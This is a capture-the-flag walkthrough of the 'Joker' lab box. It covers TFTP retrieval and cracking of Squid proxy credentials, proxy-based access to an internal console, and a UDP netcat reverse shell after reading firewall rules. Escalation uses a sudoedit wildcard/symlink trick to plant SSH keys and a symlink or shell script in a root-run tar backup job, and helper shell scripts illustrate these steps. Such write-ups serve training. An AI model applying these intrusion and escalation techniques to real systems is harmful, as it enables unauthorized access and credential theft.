Joker

Joker - 10.10.10.21

Target Enumeration:

OS: Linux

IP: 10.10.10.21

User: a298121179fe93f2978d3337dbd7057b

Root: d452b7faf5fd5b30210f340ef1d4146e

Ports / Services / Software Versions Running

22/tcp open ssh OpenSSH 7.3p1 Ubuntu 1ubuntu0.1

3128/tcp open http-proxy Squid http proxy 3.5.12

Replicating the exploit:

Nmap TCP scan: only 22/tcp (SSH) and 3128/tcp (Squid) are open.

Nmap UDP scan: a TFTP service is also listening.

Browsing to port 3128 in Firefox

Configure the Squid proxy (10.10.10.21:3128) in FoxyProxy and browse through it; the proxy asks for a username and password.

Tried default credentials, no luck.

Connect to the TFTP service found in the UDP scan and look for configuration files. TFTP needs no credentials, only the path of the file you want, so start with the Squid configuration (/etc/squid/squid.conf on Ubuntu).

The file is downloaded to our system.

Remove all comment lines (those starting with #):

grep -v '^#' squid.conf

Then drop the empty lines so only the active directives remain:

grep -v '^#' squid.conf | grep .

The auth_param line in the filtered config names the password file the proxy authenticates against; grab it via TFTP as well.

Passwords are stored as MD5 (htpasswd-style) hashes.

Crack with john, which detects the hash format itself.

kalamari:ihateseafood
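As an added example (not from the original write-up): the config filtering above as shell functions that pull the password-file path out of a Squid config, plus a check that a cracked password really matches its htpasswd MD5 (apr1) hash before you rely on it. The squid.conf excerpt, the /etc/squid/passwords path and the kalamari entry used in the demonstration are constructed here, not quoted from the box, and the verification assumes the apr1 variant of MD5 that htpasswd writes.

```shell
#!/bin/sh
# Added example, not part of the original write-up.
# Constructed squid.conf excerpt (comments, blank lines and directives mixed),
# standing in for the file fetched over TFTP.
SQUID_CONF_SAMPLE='# Recommended minimum configuration:
#
acl localnet src 10.0.0.0/8

# auth_param basic program /usr/lib/squid/basic_ncsa_auth /etc/squid/old-passwords
auth_param basic program /usr/lib/squid/basic_ncsa_auth /etc/squid/passwords
auth_param basic realm proxy
acl authenticated proxy_auth REQUIRED
http_access allow authenticated
http_access deny all

http_port 3128
'

# Same filter as in the write-up: drop comment lines, then empty lines.
effective_config() {
  grep -v '^#' "$1" | grep .
}

# The "auth_param basic program" line ends with the password file it reads.
password_file() {
  effective_config "$1" | awk '$1 == "auth_param" && $2 == "basic" && $3 == "program" { print $NF }'
}

# Check a cracked password against an htpasswd entry "user:$apr1$salt$hash"
# by recomputing the apr1 hash with the same salt (needs openssl).
# Returns 0 on match, 1 on mismatch, 2 for a hash format this does not handle.
verify_htpasswd_entry() {
  entry="$1"; candidate="$2"
  hash="${entry#*:}"
  case "$hash" in
    '$apr1$'*) ;;
    *) echo "unsupported hash format" >&2; return 2 ;;
  esac
  salt=${hash#\$apr1\$}
  salt=${salt%%\$*}
  [ "$(openssl passwd -apr1 -salt "$salt" "$candidate")" = "$hash" ]
}

# Stand-alone run: show the active directives and the file to fetch next.
demo() {
  tmp=$(mktemp)
  printf '%s' "$SQUID_CONF_SAMPLE" > "$tmp"
  echo "active directives:"
  effective_config "$tmp"
  echo "password file to fetch over tftp: $(password_file "$tmp")"
  rm -f "$tmp"
}
demo
```

Verifying john's output against the hash costs nothing and catches a wrong-format crack (a different MD5 variant) before you start retrying the proxy with a password that will never work.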

Put the cracked credentials into the FoxyProxy entry; the proxy no longer prompts for a username.

Through the proxy, go to http://127.0.0.1. The request is made by the target itself, so it reaches a web server bound only to the box's loopback interface, which is why port 80 never showed up in the scan.

Server-side request forgery through the proxy

To point tools at that internal site, add the Squid proxy (with the cracked credentials) as an upstream proxy server in Burp.

Then add a new Burp proxy listener, because the internal site is not reachable directly: requests from the attacking machine go to the listener and out through Squid to the target's localhost on port 80. Invisible proxying should not be needed, but you may have to enable it to make it work.

Browse to the 127.0.0.1 URL through the listener and you get the same page. Now use dirsearch.py to find the directory you need.

git clone https://github.com/maurosoria/dirsearch

python3 dirsearch.py -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://127.0.0.1 -e php -t 20

Eventually you get /console, an interactive console that executes code on the server.

Run some system commands from it and try to get a reverse shell.

A TCP reverse shell never connects back, which suggests a firewall is filtering outbound traffic.

Test another protocol: ping our machine from the console with tcpdump listening on our side.

That works, so the box can reach us and only some protocols are blocked.

Find the firewall rules

From the console, read the local firewall rules (iptables) and base64-encode them without line wrapping (base64 -w 0), so the whole rule set comes back as one string that can be copied out of the web page.

Copy the string into a file on our machine and decode it (base64 -d).
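As an added example (not from the original write-up): the encode-on-target, decode-on-attacker round trip, plus a small check over the decoded iptables-save text that answers the question actually being asked here, namely which protocols can open a new outbound connection. The rule set below is constructed to reproduce the behaviour seen on the box (ping works, TCP reverse shell does not, UDP does); it is not the target's real rules. The encode step assumes GNU base64 for the -w option.

```shell
#!/bin/sh
# Added example, not part of the original write-up.
# Constructed iptables-save output, not the target's real rule set.
RULES_SAMPLE='*filter
:INPUT DROP [0:0]
:FORWARD DROP [0:0]
:OUTPUT DROP [0:0]
-A INPUT -i lo -j ACCEPT
-A INPUT -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
-A INPUT -p tcp -m tcp --dport 22 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 3128 -j ACCEPT
-A OUTPUT -o lo -j ACCEPT
-A OUTPUT -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
-A OUTPUT -p icmp -j ACCEPT
-A OUTPUT -p udp -j ACCEPT
COMMIT'

# Target side: one unwrapped base64 line is easy to copy out of a web console.
# On the box you would feed it the real rules (iptables-save output or the
# saved rules file) instead of the sample.
encode_rules() {
  printf '%s\n' "$1" | base64 -w 0
}

# Attacker side: paste the string into a file and decode it.
decode_rules() {
  base64 -d "$1"
}

# Can a *new* outbound connection of protocol $1 leave the box?
# True if OUTPUT has an ACCEPT rule for that protocol or an ACCEPT policy.
# Simplification: ignores rule order, interface and port matches; established
# traffic is covered by the conntrack rule and is not what a reverse shell needs.
outbound_allowed() {
  proto="$1"; rules="$2"
  if printf '%s\n' "$rules" | grep -Eq -- "^-A OUTPUT .*-p $proto .*-j ACCEPT"; then
    return 0
  fi
  printf '%s\n' "$rules" | grep -q '^:OUTPUT ACCEPT'
}

# Stand-alone run: round-trip the sample and report what gets out.
report() {
  f=$(mktemp)
  encode_rules "$RULES_SAMPLE" > "$f"
  decoded=$(decode_rules "$f")
  rm -f "$f"
  for p in tcp udp icmp; do
    if outbound_allowed "$p" "$decoded"; then
      echo "$p: new outbound connections allowed"
    else
      echo "$p: blocked"
    fi
  done
}
report
```

The default policy line matters as much as the rules: with :OUTPUT DROP, anything without an explicit ACCEPT is dead, which is exactly the TCP reverse shell. Checking the decoded rules this way tells you which transport to pick before burning more time on listeners.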

The rules show that outbound UDP is allowed, so do the reverse shell over UDP with nc -u. Start a listener in UDP mode on our machine first (nc -u in listen mode).

Send the UDP shell from the console.

Now you have a shell.

Get a better shell (upgrade to a proper TTY).

Check sudo -l: the current user may run sudoedit as alekos on a layout.html path under /var/www, and the rule contains wildcards.

Also checked:

searchsploit for the installed sudo version.

Checking this file (layout.html):

Generate an SSH key pair on Kali so you can log in to the box and edit files with a proper terminal.

Create a layout.html that matches the sudo rule and is a symlink to alekos' authorized_keys file (/home/alekos/.ssh/authorized_keys).

Edit that file with sudoedit as alekos.

Copy the public key to the clipboard and paste it into layout.html with sudoedit.

Another way is:

sudoedit -u alekos /var/www/ .ssh/authorized_keys /layout.html

which edits three files at once. The spaces are deliberate: sudo joins the arguments with spaces and matches the joined string against the wildcard rule, so the three paths together satisfy a pattern that .ssh/authorized_keys alone never would. The second path is relative, so run this from the directory that holds alekos' .ssh.
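As an added example (not from the original write-up): why the three-argument sudoedit command matches. sudo builds one string from the arguments, joined with single spaces, and matches it against the sudoers pattern with fnmatch(3) without FNM_PATHNAME, so a * can cover slashes and spaces. The write-up does not print the sudo -l output, so the rule pattern below is an assumption reconstructed from that command; POSIX case pattern matching is used to stand in for fnmatch, which behaves the same way for these inputs.

```shell
#!/bin/sh
# Added example, not part of the original write-up.
# Assumed sudoers file pattern (the actual rule is not shown in the write-up).
RULE_PATTERN='/var/www/*/*/layout.html'

# Print the single string sudo actually matches for an argument list.
joined_args() {
  printf '%s\n' "$*"
}

# Would these sudoedit file arguments satisfy the rule?
# "$*" joins with spaces like sudo does; an unquoted variable in a case
# pattern is matched as a glob, and '*' there spans '/' and ' ' as in
# fnmatch without FNM_PATHNAME.
sudoedit_args_match() {
  joined="$*"
  case "$joined" in
    $RULE_PATTERN) return 0 ;;
    *) return 1 ;;
  esac
}

# Stand-alone run: verdict plus the joined string, for several argument lists.
check() {
  if sudoedit_args_match "$@"; then verdict=allowed; else verdict=denied; fi
  printf '%-8s %s\n' "$verdict" "$(joined_args "$@")"
}
check /var/www/testing/x/layout.html
check /var/www/testing/layout.html
check /home/alekos/.ssh/authorized_keys
check /var/www/ .ssh/authorized_keys /layout.html
```

The last line is the trick from the write-up: the first * swallows " .ssh" and the second swallows "authorized_keys ", so the joined string ends in /layout.html as the rule demands, and sudoedit then opens all three paths. Modern sudo also has sudoedit_checkdir and sudoedit_follow settings that refuse symlinks in user-writable directories, which is why knowing the argument-joining form is worth it when the symlink variant fails.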

Exit the editor and save the file.

SSH into the box as alekos with the new key.

User.txt: a298121179fe93f2978d3337dbd7057b

Privilege Escalation

Navigate to /home/alekos/backups and list it: a new archive appears every 5 minutes.

mkdir extracted && cd extracted

tar -xvf ../dev-1511680202.tar.gz

The archive contains the development folder, so /home/alekos/development is backed up every 5 minutes by a job that, as the result shows, runs as root.

To get the root flag:

Replace the development directory with a symlink to the root-owned directory you want archived (e.g. /root), so the next backup run reads through it.

Wait 5 minutes, copy the latest dev-*.tar.gz out, extract it, and you will find the root flag inside.
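As an added example (not from the original write-up): a throwaway lab showing when a backup job's tar actually follows a symlink, which is what the trick above depends on. A link dropped inside the backed-up directory is stored as a link with no content unless tar dereferences (-h); a directory that is itself a symlink is followed when the job enters it before archiving, but archived as a bare link when tar is given its name from outside. The secret directory, the flag value and both invocation styles are constructed; the box's real cron command is not shown in the write-up.

```shell
#!/bin/sh
# Added example, not part of the original write-up.
# Lab: "secret" stands in for /root, "development" for /home/alekos/development.
make_lab() {
  lab=$(mktemp -d)
  mkdir -p "$lab/secret" "$lab/development"
  echo 'constructed-flag' > "$lab/secret/root.txt"   # constructed, not the real flag
  printf '%s\n' "$lab"
}

# Case A: a symlink placed *inside* the backed-up directory.
# $1 = extra tar flag ("" or -h). Prints the archived member type:
# "l" = stored as a link (no content), "-" = regular file (content copied).
inner_symlink_member_type() {
  lab=$(make_lab)
  ln -s "$lab/secret/root.txt" "$lab/development/root.txt"
  (cd "$lab" && tar $1 -cf dev.tar development)
  tar -tvf "$lab/dev.tar" development/root.txt | cut -c1
  rm -rf "$lab"
}

# Case B: "development" itself replaced by a symlink to the secret directory.
# $1 selects how the job names its input; prints the archive path.
#   byname: tar -cf dev.tar development        (run from the parent directory)
#   inside: cd development && tar -cf dev.tar . (job enters the directory first)
backup_with_dir_symlink() {
  lab=$(make_lab)
  rm -rf "$lab/development"
  ln -s "$lab/secret" "$lab/development"
  case "$1" in
    byname) (cd "$lab" && tar -cf dev.tar development) ;;
    inside) (cd "$lab/development" && tar -cf "$lab/dev.tar" .) ;;
    *) echo "unknown mode: $1" >&2; return 2 ;;
  esac
  printf '%s\n' "$lab/dev.tar"
}

# Number of root.txt entries in an archive (0 means only the link was stored).
secret_entries() {
  tar -tf "$1" | grep -c 'root\.txt$' || true
}

# What the write-up does with the latest archive: extract it and read the file.
recover_secret() {
  out=$(mktemp -d)
  tar -xf "$1" -C "$out"
  cat "$out/root.txt"
  rm -rf "$out"
}

cleanup_archive_lab() {
  rm -rf "$(dirname "$1")"
}

# Stand-alone run
echo "inner symlink, plain tar : $(inner_symlink_member_type "")   (l = link only)"
echo "inner symlink, tar -h    : $(inner_symlink_member_type -h)   (- = content copied)"
for mode in byname inside; do
  a=$(backup_with_dir_symlink "$mode")
  echo "directory symlink, $mode: $(secret_entries "$a") secret file(s) in archive"
  cleanup_archive_lab "$a"
done
```

If the first attempt on a box yields an archive containing nothing but a symlink entry, this is the reason: the job names the directory from outside and tar stored the link. Check what the extracted tarball contains with tar -tvf before waiting another five minutes.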

Second way

Create shell.sh in the directory the backup job processes, containing a reverse shell back to our machine on port 8082.

Make the file executable:

chmod +x shell.sh

Set up an nc listener on port 8082 and wait for the next backup run; the shell that comes back is root.